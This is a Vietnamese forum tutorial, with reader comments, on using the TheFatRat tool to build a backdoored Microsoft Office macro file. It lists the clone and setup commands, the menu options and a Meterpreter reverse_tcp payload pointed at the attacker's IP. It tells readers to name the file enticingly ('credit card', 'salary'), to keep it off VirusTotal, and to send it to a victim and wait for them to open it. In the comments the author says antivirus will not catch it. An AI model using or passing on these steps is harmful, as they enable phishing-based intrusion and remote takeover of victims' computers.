Tạo Microsoft Office backdoor với TheFatRat

[maldet]

TheFatRat là một công cụ tạo backdoor khá hay. Tuy nhiên, trong bài này mình sẽ chỉ hướng dẫn sử dụng công cụ TheFatRat để chèn backdoor vào tập tin Office trên nền tảng Windows. Ngoài ra các bạn có thể mày mò thêm các chức năng khác.
Cần chuẩn bị:

• TheFatRat (đương nhiên)
• Kali Linux

Các bước thực hiện:
1. Cài đặt TheFatRat:

• git clone https://github.com/Screetsec/TheFatRat.git
• cd TheFatRat
• chmod +x setup.sh && ./setup.sh

2. Sau khi cài đặt thành công và chạy TheFatRat, lần lượt thực hiện theo thứ tự sau:
Chọn [6] Create Fud Backdoor 1000% with PwnWinds [Excellent]
Chọn [2] The Microsoft Office Macro on Windows
SET LHOST: IP của kẻ tấn công
SET LPORT: cổng dịch vụ
Enter the base name for output files: tên của tập tin được chèn backdoor, đặt cho hấp dẫn để kích thích nạn nhân muốn mở ra (ví dụ: credit card, salary, ...).
Hộp thoại Available Payloads: Chọn windows/meterpreter/reverse_tcp
Sau đó chờ backdoor được tạo tự động. Nên nhớ đừng tải "sản phẩm" lên Virustotal nhé
3. Gửi "sản phẩm" cho nạn nhân, làm tách cafe và chờ nạn nhân mở lên để khai thác thôi!
Video demo để dễ theo dõi:

 

Anh ơi cho em hỏi xíu , liệu phần mềm diệt virus có phát hiện được không ạ ??

 

Anh ơi cho em hỏi xíu , liệu phần mềm diệt virus có phát hiện được không ạ ??

Không em nhé!

 

Không em nhé!

Em gắn vào file khác k phải của Microsoft được không ạ ??

 

Và có công cụ nào tạo Rootkit...

 

Em gắn vào file khác k phải của Microsoft được không ạ ??

Có hỗ trợ Microsoft Office và OpenOffice em ạ.

 

Và có công cụ nào tạo Rootkit...

Bạn nên hiểu thế nào là rootkit trước .

 

SET LHOST: IP của nạn nhân
có gì đó sai sai

 

SET LHOST: IP của nạn nhân
có gì đó sai sai

Đọc lướt qua không để ý, đọc kỹ lại mới thấy đúng là có gì đó hơi sai @@

 

SET LHOST: IP của nạn nhân
có gì đó sai sai

mình đã edit lại nhé, thanks các bạn